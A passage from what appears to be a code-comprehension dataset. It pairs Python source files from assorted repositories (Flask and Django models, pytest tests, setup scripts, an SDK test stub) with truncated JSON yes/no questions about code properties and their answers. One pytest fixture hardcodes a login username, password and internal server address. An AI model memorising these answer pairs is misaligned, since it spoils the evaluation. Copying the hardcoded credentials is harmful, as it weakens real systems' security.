price = db.Column('price', db.Float)
def __repr__(self):
return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
class CompoundBAT(db.Model):
__tablename__ = 'compoundbat'
id = db.Column('id', db.Integer, primary_key=True)
blocknumber = db.Column('blocknumber', db.Integer)
timestamp = db.Column('timestamp', db.Integer)
price = db.Column('price', db.Float)
def __repr__(self):
return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false... | 3 | src/models/compound.py | Dragonfly-Capital/oracles.club.server |
from django.contrib import admin
from django.utils.translation import ugettext, ugettext_lazy as _
from ella.positions.models import Position
from ella.utils import timezone
class PositionOptions(admin.ModelAdmin):
def show_title(self, obj):
if not obj.target:
return '-- %s --' % ugettext('empty position')
else:
return u'%s [%s]' % (
getattr(obj.target, 'title', obj.target),
ugettext(obj.target_ct.name),
)
show_title.short_description = _('Title')
def is_filled(self, obj):
if obj.target:
return True
else:
return False
is_filled.short_description = _('Filled')
is_filled.boolean = True
def is_active(self, obj):
if obj.disabled:
return False
now = timezone.now()
active_from = not obj.active_from or obj.active_from <= now
active_till = not obj.active_till or obj.active_till > now
return active_from and active_till
is_active.short_description = _('Active')
is_active.boolean = True
list_display = ('name', 'category', 'box_type', 'is_active', 'is_filled', 'show_title', 'disabled',)
list_filter = ('category', 'name', 'disabled', 'active_from', 'active_till',)
search_fields = ('box_type', 'text',)
# suggest_fields = {'category': ('tree_path', 'title', 'slug',),}
admin.site.register(Position, PositionOptions)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | ella/positions/admin.py | petrlosa/ella |
# -*- coding: utf-8 -*-
import unittest.mock
import pytest
import pycamunda.activityinst
import pycamunda.incident
INCIDENT_TYPE_COUNT = pycamunda.incident.IncidentTypeCount(
incident_type=pycamunda.incident.IncidentType.failed_job,
incident_count=1
)
@unittest.mock.patch(
'pycamunda.incident.IncidentTypeCount.load',
lambda _: INCIDENT_TYPE_COUNT
)
def test_transition_instance_load(my_transition_instance_json):
instance = pycamunda.activityinst.TransitionInstance.load(my_transition_instance_json)
assert instance.id_ == my_transition_instance_json['id']
assert instance.activity_id == my_transition_instance_json['activityId']
assert instance.activity_name == my_transition_instance_json['activityName']
assert instance.activity_type == my_transition_instance_json['activityType']
assert instance.process_instance_id == my_transition_instance_json['processInstanceId']
assert instance.process_definition_id == my_transition_instance_json['processDefinitionId']
assert instance.execution_ids == tuple(my_transition_instance_json['executionId'])
assert instance.incident_ids == tuple(my_transition_instance_json['incidentIds'])
assert instance.incidents == (INCIDENT_TYPE_COUNT, )
def test_transition_instance_load_raises_keyerror(my_transition_instance_json):
for key in my_transition_instance_json:
json_ = dict(my_transition_instance_json)
del json_[key]
with pytest.raises(KeyError):
pycamunda.activityinst.TransitionInstance.load(json_)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | tests/activityinst/test_transitioninstance.py | asyncee/pycamunda |
from CtCI_Custom_Classes.stack import Stack
class SetOfStacks:
def __init__(self, capacity):
self.capacity = capacity
self.stacks = []
def get_last_stack(self):
if not self.stacks:
return None
return self.stacks[-1]
def is_empty(self):
last = self.get_last_stack()
return not last or last.is_empty()
def pop(self):
last = self.get_last_stack()
if not last:
return None
v = last.pop()
if last.get_size() == 0:
del self.stacks[-1]
return v
def push(self, data):
last = self.get_last_stack()
if last and not last.is_full():
last.push(data)
else:
stack = Stack(self.capacity)
stack.push(data)
self.stacks.append(stack)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | CtCI_custom_classes/overflow_stack.py | enyquist/Cracking_the_Coding_Interview |
from setuptools import setup,find_packages
import os
import shutil
#remove the dist folder first if exists
if os.path.exists("dist"):
shutil.rmtree("dist")
def readme():
with open('README.rst') as f:
return(f.read())
VERSION = '1.0.53'
def write_version_py(filename='SigProfilerTopography/version.py'):
# Copied from numpy setup.py
cnt = """
# THIS FILE IS GENERATED FROM SIGPROFILERTOPOGRAPHY SETUP.PY
short_version = '%(version)s'
version = '%(version)s'
"""
fh = open(filename, 'w')
fh.write(cnt % {'version': VERSION,})
fh.close()
write_version_py()
setup(name="SigProfilerTopography",
version=VERSION,
author="Burcak Otlu",
author_email="burcakotlu@eng.ucsd.edu",
description="SigProfilerTopography provides topography analyses for substitutions, dinucleotides and indels for all given samples.",
url="https://github.com/AlexandrovLab/SigProfilerTopography",
license='UCSD',
packages=find_packages(),
install_requires=[
"SigProfilerMatrixGenerator>=1.1.27",
"SigProfilerSimulator>=1.1.2",
"XlsxWriter>=1.3.7",
"pandas>=1.1.5",
"numpy>=1.20.1",
"matplotlib>=2.2.2",
"scipy>=1.1.0",
"statsmodels>=0.9.0",
"fastrand>=1.2",
"psutil>=5.6.3"],
include_package_data=True,
zip_safe=False)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | setup.py | AlexandrovLab/SigProfilerTopography |
# Generic memory-mapped peripheral interface.
#
# Luz micro-controller simulator
# Eli Bendersky (C) 2008-2010
#
class Peripheral(object):
""" An abstract memory-mapped perhipheral interface.
Memory-mapped peripherals are accessed through memory
reads and writes.
The address given to reads and writes is relative to the
peripheral's memory map.
Width is 1, 2, 4 for byte, halfword and word accesses.
"""
def read_mem(self, addr, width):
raise NotImplementedError()
def write_mem(self, addr, width, data):
raise NotImplementedError()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cla... | 3 | luz_asm_sim/lib/simlib/peripheral/peripheral.py | eliben/luz-cpu |
import os
import pandas as pd
from .utils import load_setting
class Divider(object):
def __init__(self, df, files, base):
self.data = df
self.files = files
self.base = base
self.writers = dict()
def _setup_writer(self, outdir):
assert self.files
os.makedirs(outdir, exist_ok=True)
for name in self.files.keys():
path = os.path.join(outdir, name)
self.writers[name] = pd.ExcelWriter(path, engine='xlsxwriter')
def save(self, outdir):
self._setup_writer(outdir)
for classname, member in self.data.groupby(self.base):
member = member.drop(self.base, axis=1)
for filename, classnames in self.files.items():
if classname in classnames:
target = self.writers[filename]
break
else:
raise RuntimeError
member.to_excel(target, classname, index=False)
for w in self.writers.values():
w.save()
def divider(df):
setting = load_setting()['divider']
div = Divider(df, setting["file"], setting["base"])
div.save(load_setting()['system']['tmpdir'])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | murasame/divider.py | amaotone/caruta-contest-manager |
import pytest
from service.common.login import LoginPage
"""
function:每一个函数或方法都会调用
class:每一个类调用一次,一个类可以有多个方法
module:每一个.py文件调用一次,该文件内又有多个function和class
session:是多个文件调用一次,可以跨.py文件调用,每个.py文件就是module
"""
@pytest.fixture()
def session(page):
return LoginPage(page).login(
username='18886885',
password='Admin@123',
base_url='http://172.23.16.13:8888/oauth/login',
)
def pytest_sessionstart():
...
def pytest_sessionfinish(session):
...
@pytest.hookimpl(hookwrapper=True)
def pytest_collection():
yield
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | conftest.py | aquichita/awesome-pytest-playwright |
from __future__ import annotations
from . import Endpoint
import web_framework_v2.http.http_request as http_request
class EndpointMap:
def __init__(self):
self._method_routes_map = {} # HttpMethod: {route_str: Route}
def get_endpoint(self, request: http_request.HttpRequest) -> tuple[Endpoint | None, str | None] | None:
endpoint_obj = self._method_routes_map.get(request.method, {}).get(request.url, None)
if endpoint_obj is None:
method_routes = self._method_routes_map.get(request.method, None)
if method_routes is None:
return None, None
for route in method_routes.values():
matches, variable_map = route.matches_url(request.url)
if matches and route.matches_headers(request):
return route, variable_map
if endpoint_obj is not None and not endpoint_obj.matches_headers(request):
return None, None
return endpoint_obj, None
def add_route(self, route: Endpoint):
assert self._method_routes_map.get(route.method(), {}).get(route.route(), None) is None, \
"Route already exists! Cannot add existing route!"
self._method_routes_map.setdefault(route.method(), {})
self._method_routes_map[route.method()][route.route()] = route
def __str__(self):
return str(self._method_routes_map)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | web_framework_v2/route/endpoint_map.py | Heknon/web_framework_v2 |
import numpy as np
from typing import Union, Tuple, Dict
class Agent(object):
def get_action(self, obs:np.ndarray, stochastic:bool=True)-> Tuple[Union[int, np.ndarray, Dict], float]:
raise NotImplementedError
def update(self, obs:np.ndarray, act:Union[int, np.ndarray, Dict], blogp:float, reward:float, obs_next:np.ndarray, terminal:bool)->Union[np.ndarray, None]:
raise NotImplementedError
def new_episode(self):
raise NotImplementedError
class FixedAgent(Agent):
def __init__(self, policy):
self.policy = policy
def get_action(self, obs:np.ndarray, stochastic:bool=True)-> Tuple[Union[int, np.ndarray, Dict], float]:
return self.policy.get_action(obs, stochastic)
def update(self, obs:np.ndarray, act:Union[int, np.ndarray, Dict], blogp:float, reward:float, obs_next:np.ndarray, terminal:bool)->Union[np.ndarray, None]:
return None
def new_episode(self):
pass | [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | rllib/agents/agent.py | ScottJordan/python-rllib |
from node.myownp2pn import MyOwnPeer2PeerNode
from lib.settings import the_settings
def ndstart(port):
node = MyOwnPeer2PeerNode("",port)
node.debug = the_settings().debug_mode()
node.start()
def ndstop():
MyOwnPeer2PeerNode.main_node.stop()
def ndconnect(ip,port):
MyOwnPeer2PeerNode.main_node.connect_with_node(ip, port)
def ndconnectmix_blockchain_network():
MyOwnPeer2PeerNode.main_node.connectionfrommix_blockchain_network() | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exclu... | 3 | func/node_connection.py | cyberhacktowelie/POW-Blockchain-Network-Infrustructure |
import json
import re
import requests
import dbt.exceptions
import dbt.semver
PYPI_VERSION_URL = 'https://pypi.org/pypi/dbt/json'
def get_latest_version():
try:
resp = requests.get(PYPI_VERSION_URL)
data = resp.json()
version_string = data['info']['version']
except (json.JSONDecodeError, KeyError, requests.RequestException):
return None
return dbt.semver.VersionSpecifier.from_version_string(version_string)
def get_installed_version():
return dbt.semver.VersionSpecifier.from_version_string(__version__)
def get_version_information():
installed = get_installed_version()
latest = get_latest_version()
installed_s = installed.to_version_string(skip_matcher=True)
if latest is None:
latest_s = 'unknown'
else:
latest_s = latest.to_version_string(skip_matcher=True)
version_msg = ("installed version: {}\n"
" latest version: {}\n\n".format(installed_s, latest_s))
if latest is None:
return ("{}The latest version of dbt could not be determined!\n"
"Make sure that the following URL is accessible:\n{}"
.format(version_msg, PYPI_VERSION_URL))
if installed == latest:
return "{}Up to date!".format(version_msg)
elif installed > latest:
return ("{}Your version of dbt is ahead of the latest "
"release!".format(version_msg))
else:
return ("{}Your version of dbt is out of date! "
"You can find instructions for upgrading here:\n"
"https://docs.getdbt.com/docs/installation"
.format(version_msg))
__version__ = '0.13.0'
installed = get_installed_version()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | core/dbt/version.py | ClaySheffler/dbt |
import random
import numpy as np
from easydict import EasyDict as edict
def get_default_augment_config():
config = edict()
config.do_aug = True
config.scale_factor = 0.25
config.rot_factor = 15
config.center_factor = 0.10 # 15% relative to the patch size
config.color_factor = 0.2
config.do_flip_aug = True
config.rot_aug_rate = 0.6 #possibility to rot aug
config.flip_aug_rate = 0.5 #possibility to flip aug
config.use_color_normalize = True
config.mean = np.array([0.485 * 255, 0.456 * 255, 0.406 * 255])
config.std = np.array([0.229 * 255, 0.224 * 255, 0.225 * 255])
config.multiplier = [0.5, 1., 1.5, 2, 2.5]
return config
def do_augmentation(aug_config):
scale = np.clip(np.random.randn(), -0.5, 1.0) * aug_config.scale_factor + 1.0
rot = np.clip(np.random.randn(), -1.0, 1.0) * aug_config.rot_factor \
if random.random() <= aug_config.rot_aug_rate else 0
center = np.abs(np.clip(np.random.randn(2), -1.0, 1.0)) * aug_config.center_factor
do_flip = aug_config.do_flip_aug and random.random() <= aug_config.flip_aug_rate
c_up = 1.0 + aug_config.color_factor
c_low = 1.0 - aug_config.color_factor
color_scale = [random.uniform(c_low, c_up), random.uniform(c_low, c_up), random.uniform(c_low, c_up)]
return scale, rot, center, do_flip, color_scale
def get_multiplier(img_size, scale_search, patch_size):
"""Computes the sizes of image at different scales
:param img: numpy array, the current image
:returns : list of float. The computed scales
"""
return [x * patch_size / float(img_size) for x in scale_search] | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excludi... | 3 | common/utility/augment.py | klo9klo9kloi/win_det_heatmaps |
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import scipy.linalg as sl
from odelab.scheme import Scheme
from newton import FSolve, Newton
class EulerMaruyama(Scheme):
def step(self,t,u,h):
system = self.system
noise = np.random.normal(size=[len(system.noise(t,u).T)])
def residual(v):
return (system.mass(t+h,v) - system.mass(t,u))/h - system.deterministic(t+h,v) - np.sqrt(h)/h*np.dot(system.noise(t,u),noise)
N = Newton(residual)
## N.xtol = min(N.xtol, h*1e-4)
result = N.run(u)
return t+h, result
def linstep(self,t,u):
return t+self.h, sl.solve(self.system.mass_mat-self.h*self.system.det_mat, np.dot(self.system.mass_mat,u)-self.h*self.system.V(t+self.h))
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | odelab/scheme/stochastic.py | olivierverdier/odelab |
__author__ = 'erasmospunk'
import unittest
from utils import hash_160_to_address, bc_address_to_hash_160
class UtilTest(unittest.TestCase):
def test_hash_160_to_address(self):
self.assertEqual(hash_160_to_address(None), None)
self.assertEqual(hash_160_to_address('04e9fca1'.decode('hex')), None)
self.assertEqual(hash_160_to_address('04e9fca1f96e021dfaf35bbea267ec2c60787c1b1337'.decode('hex')), None)
self.assertEqual(hash_160_to_address('1ad3b0b711f211655a01142fbb8fecabe8e30b93'.decode('hex')),
'13SrAVFPVW1txSj34B8Bd6hnDbyPsVGa92')
def test_bc_address_to_hash_160(self):
self.assertEqual(bc_address_to_hash_160(None), None)
self.assertEqual(bc_address_to_hash_160(''), None)
self.assertEqual(bc_address_to_hash_160('13SrAVFPVW1txSj34B8Bd6hnDbyPsVGa921337'), None)
self.assertEqual(bc_address_to_hash_160('13SrAVFPVW1txSj34B8Bd6hnDbyPsVGa92').encode('hex'),
'1ad3b0b711f211655a01142fbb8fecabe8e30b93')
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | src/test/test_utils.py | RdeWilde/ion-electrum-server |
from invoke import task
@task
def dist(context):
context.run("python setup.py bdist_wheel")
@task
def test(context):
context.run("tox")
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?... | 3 | tasks.py | mtkennerly/clingy |
# Copyright 2016 Husky Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LogisticRegressionModelReceiver(object):
def __init__(self):
pass
@staticmethod
def register(receiver_map):
receiver_map["LogisticRegressionModel#LogisticR_train_py"] = LogisticRegressionModelReceiver.train_receiver
@staticmethod
def train_receiver(reply):
res = []
# eat dummy int64 represents the string length
dummy = reply.load_int64()
n_params = reply.load_int32()
for _ in xrange(n_params):
param_v = reply.load_double()
res.append(param_v)
return res
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | python/pyhusky/frontend/library/logistic_regression_receiver.py | husky-team/PyHusky |
import os
import re
from pathlib import Path
from subprocess import PIPE
from typing import List
import pytest
from _pytest.capture import CaptureFixture
from _pytest.monkeypatch import MonkeyPatch
import scanpy
from scanpy.cli import main
HERE = Path(__file__).parent
@pytest.fixture
def set_path(monkeypatch: MonkeyPatch) -> None:
monkeypatch.setenv('PATH', str(HERE / '_scripts'), prepend=os.pathsep)
def test_builtin_settings(capsys: CaptureFixture):
main(['settings'])
captured = capsys.readouterr()
assert captured.out == f'{scanpy.settings}\n'
@pytest.mark.parametrize('args', [[], ['-h']])
def test_help_displayed(args: List[str], capsys: CaptureFixture):
try: # -h raises it, no args doesn’t. Maybe not ideal but meh.
main(args)
except SystemExit as se:
assert se.code == 0
captured = capsys.readouterr()
assert captured.out.startswith('usage: ')
def test_help_output(set_path: type(None), capsys: CaptureFixture):
with pytest.raises(SystemExit, match='^0$'):
main(['-h'])
captured = capsys.readouterr()
assert re.search(r'^positional arguments:\n\s+\{settings,[\w,-]*testbin[\w,-]*\}$', captured.out, re.MULTILINE)
def test_external(set_path: type(None)):
# We need to capture the output manually, since subprocesses don’t write to sys.stderr
cmd = main(['testbin', '-t', '--testarg', 'testpos'], stdout=PIPE, encoding='utf-8', check=True)
assert cmd.stdout == 'test -t --testarg testpos\n'
def test_error_wrong_command(capsys: CaptureFixture):
with pytest.raises(SystemExit, match='^2$'):
main(['idonotexist--'])
captured = capsys.readouterr()
assert 'No command “idonotexist--”. Choose from' in captured.err
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | scanpy/tests/test_binary.py | gamazeps/scanpy |
#!/usr/bin/env python3
# Copyright (c) 2009 Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Generate MANIFEST.in file.
"""
import os
import subprocess
SKIP_EXTS = ('.png', '.jpg', '.jpeg')
SKIP_FILES = ('.cirrus.yml', '.travis.yml', 'appveyor.yml')
SKIP_PREFIXES = ('.ci/', '.github/', 'scripts/internal/')
def sh(cmd):
return subprocess.check_output(
cmd, shell=True, universal_newlines=True).strip()
def main():
files = sh("git ls-files").split('\n')
for file in files:
if file.startswith(SKIP_PREFIXES) or \
os.path.splitext(file)[1].lower() in SKIP_EXTS or \
file in SKIP_FILES:
continue
print("include " + file)
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | scripts/internal/generate_manifest.py | zed/psutil |
"""
Basic utility functions
"""
from __future__ import annotations
import json
import docker
from cloudfiles import CloudFiles
import cloudvolume as cv
def sendjsonfile(cloudvolume: cv.CloudVolume,
filename: str,
content: str
) -> None:
"""Stores a json file using CloudFiles.
Args:
cloudvolume: A CloudVolume.
filename: The filename to use under the CloudVolume's cloudpath.
content: The JSON content of the file as a string.
"""
cf = CloudFiles(cloudvolume.cloudpath)
prettycontent = json.loads(content)
prettycontent = json.dumps(prettycontent,
sort_keys=True,
indent=2,
separators=(',', ': '))
cf.put(filename, prettycontent,
cache_control='no-cache',
content_type='application/json')
def dockerimageID(imagename: str, tag: str) -> str:
"""Fetches the full image ID from a docker image name and tag.
Requires the current user to have access to the docker daemon.
Args:
imagename: The image name to identify.
tag: The image tag to identify.
Returns:
The SHA hash of the docker image under the image name and tag if
it can be found.
Raises:
ValueError: Unable to find the requested image.
"""
key = f'{imagename}:{tag}'
client = docker.from_env()
images = client.images.list()
imagelookup = dict()
for image in images:
for tag in image.tags:
assert tag not in imagelookup, 'multiple images have the same tag?'
imagelookup[tag] = image.id
if key in imagelookup:
return imagelookup[key]
else:
raise ValueError(f'{key} not found in the current docker image list')
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": tru... | 3 | provenancetoolbox/utils.py | ZettaAI/provenance-toolbox |
from plato.test.base import BaseTestCase
from sqlalchemy.exc import IntegrityError
from plato import db
from plato.model.user import User
from plato.test.utils import add_user
class TestUserModel(BaseTestCase):
def test_user_model(self):
user = add_user('foo', 'foo@bar.com', 'test_pwd')
self.assertTrue(user.id)
self.assertEqual('foo', user.username)
self.assertEqual('foo@bar.com', user.email)
self.assertTrue(user.active)
self.assertTrue(user.created_at)
self.assertTrue(user.password)
self.assertTrue(user.admin == False)
def test_add_user_duplicate_username(self):
add_user('foo', 'foo@bar.com', 'test_pwd')
duplicate_user = User('foo', 'foo_1@bar.com', 'test_pwd')
db.session.add(duplicate_user)
self.assertRaises(IntegrityError, db.session.commit)
def test_add_user_duplicate_email(self):
add_user('foo', 'foo@bar.com', 'test_pwd')
duplicate_user = User('foo_1', 'foo@bar.com', 'test_pwd')
db.session.add(duplicate_user)
self.assertRaises(IntegrityError, db.session.commit)
def test_passwords_are_random(self):
user_foo = add_user('foo', 'foo@bar.com', 'test_pwd')
user_bar = add_user('bar', 'bar@bar.com', 'test_pwd')
self.assertNotEqual(user_foo.password, user_bar.password)
def test_encode_auth_token(self):
user = add_user('test@test.com', 'test@test.com', 'test')
auth_token = user.encode_auth_token(user.id)
self.assertTrue(isinstance(auth_token, bytes))
def test_decode_auth_token(self):
user = add_user('test@test.com', 'test@test.com', 'test')
auth_token = user.encode_auth_token(user.id)
self.assertTrue(isinstance(auth_token, bytes))
self.assertTrue(User.decode_auth_token(auth_token), user.id)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | server/plato/test/test_user_model.py | zhlooking/plato |
# coding: utf-8
'''Fauzi, fauzi@soovii.com'''
from flask import Blueprint, request
from flask_restful import Api, reqparse
from app.view import Resource
from app.model import db
# from app.main.model import Main
from sqlalchemy.exc import SQLAlchemyError
from log import logger
mainBlueprint = Blueprint('main', __name__)
api = Api(mainBlueprint)
parser = reqparse.RequestParser()
parser.add_argument('id', type=int)
class Index(Resource):
# Get something
# curl -i http://localhost:5555/
def get(self):
logger.debug('main is accessed.')
return { 'status': True }
# Create something
def post(self):
args = parser.parse_args()
# Update something
def put(self):
args = parser.parse_args()
# Delete something
def delete(self):
args = parser.parse_args()
api.add_resource(Index, '/', '/main/')
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | app/main/view.py | fauziwei/_flask_ |
# Copyright (c) 2015 Pixomondo
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the MIT License included in this
# distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the MIT License. All rights
# not expressly granted therein are reserved by Pixomondo.
"""
Geometry Output App for Houdini
"""
import sgtk
class GeometryOutputNode(sgtk.platform.Application):
def init_app(self):
module = self.import_module("tk_houdini_geometrynode")
self.handler = module.ToolkitGeometryNodeHandler(self)
def convert_to_geometry_nodes(self):
"""
Convert all Shotgun Geometry nodes found in the current Script to regular
Geometry nodes. Additional toolkit information will be stored in
user data named 'tk_*'
"""
self.handler.convert_sg_to_geometry_nodes()
def convert_from_geometry_nodes(self):
"""
Convert all regular Geometry nodes that have previously been converted
from Shotgun Geometry nodes, back into Shotgun Geometry nodes.
"""
self.handler.convert_geometry_to_sg_nodes()
def get_nodes(self):
"""
Returns a list of hou.node objects for each tk alembic node.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-geometrynode"]
>>> tk_alembic_nodes = app.get_nodes()
"""
self.log_debug("Retrieving tk-houdini-geometrynode nodes...")
tk_houdini_geometrynode = self.import_module("tk_houdini_geometrynode")
nodes = tk_houdini_geometrynode.ToolkitGeometryNodeHandler.\
get_all_tk_geometry_nodes()
self.log_debug("Found %s tk-houdini-geometrynode nodes." % (len(nodes),))
return nodes
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answ... | 3 | app.py | ssvfx41/tk-houdini-geometrynode |
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
from typing import Iterable
from .. import QuerySetReader, BaseRecursiveDriver
if False:
from ...proto import jina_pb2
class SliceQL(QuerySetReader, BaseRecursiveDriver):
"""Restrict the size of the ``docs`` to ``k`` (given by the request)
Example::
- !ReduceAllDriver
with:
granularity_range: [0, 0]
adjacency_range: [0, 1]
- !SortQL
with:
reverse: true
field: 'score.value'
granularity_range: [0, 0]
adjacency_range: [0, 1]
- !SliceQL
with:
start: 0
end: 50
granularity_range: [0, 0]
adjacency_range: [0, 1]
`SliceQL` will ensure that only the first 50 documents are returned from this `Pod`
"""
def __init__(self, start: int, end: int = None, *args, **kwargs):
"""
:param start: Zero-based index at which to start extraction.
:param end: Zero-based index before which to end extraction.
slice extracts up to but not including end. For example, take(1,4) extracts
the second element through the fourth element (elements indexed 1, 2, and 3).
"""
super().__init__(*args, **kwargs)
self._start = int(start)
self._end = int(end)
self.is_apply = False
def _apply_all(self, docs: Iterable['jina_pb2.Document'], *args, **kwargs):
if self.start <= 0 and (self.end is None or self.end >= len(docs)):
pass
else:
del docs[int(self.end):]
del docs[:int(self.start)]
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
... | 3 | jina/drivers/querylang/slice.py | kaushikb11/jina |
from .varint_parser import parse_varint
def parse_record(stream, column_count):
"""
Parses SQLite's "Record Format" as mentioned here: https://www.sqlite.org/fileformat.html#record_format
"""
_number_of_bytes_in_header = parse_varint(stream)
serial_types = [parse_varint(stream) for i in range(column_count)]
return [parse_column_value(stream, serial_type) for serial_type in serial_types]
def parse_column_value(stream, serial_type):
if (serial_type >= 13) and (serial_type % 2 == 1):
# Text encoding
n_bytes = (serial_type - 13) // 2
return stream.read(n_bytes)
elif serial_type == 1:
# 8 bit twos-complement integer
return int.from_bytes(stream.read(1), "big")
else:
# There are more cases to handle, fill this in as you encounter them.
raise Exception(f"Unhandled serial_type {serial_type}")
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (... | 3 | starter_templates/sqlite/python/app/record_parser.py | knarkzel/languages |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 10
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_9_0_0
from isi_sdk_9_0_0.models.network_pools import NetworkPools # noqa: E501
from isi_sdk_9_0_0.rest import ApiException
class TestNetworkPools(unittest.TestCase):
"""NetworkPools unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNetworkPools(self):
"""Test NetworkPools"""
# FIXME: construct object with mandatory attributes with example values
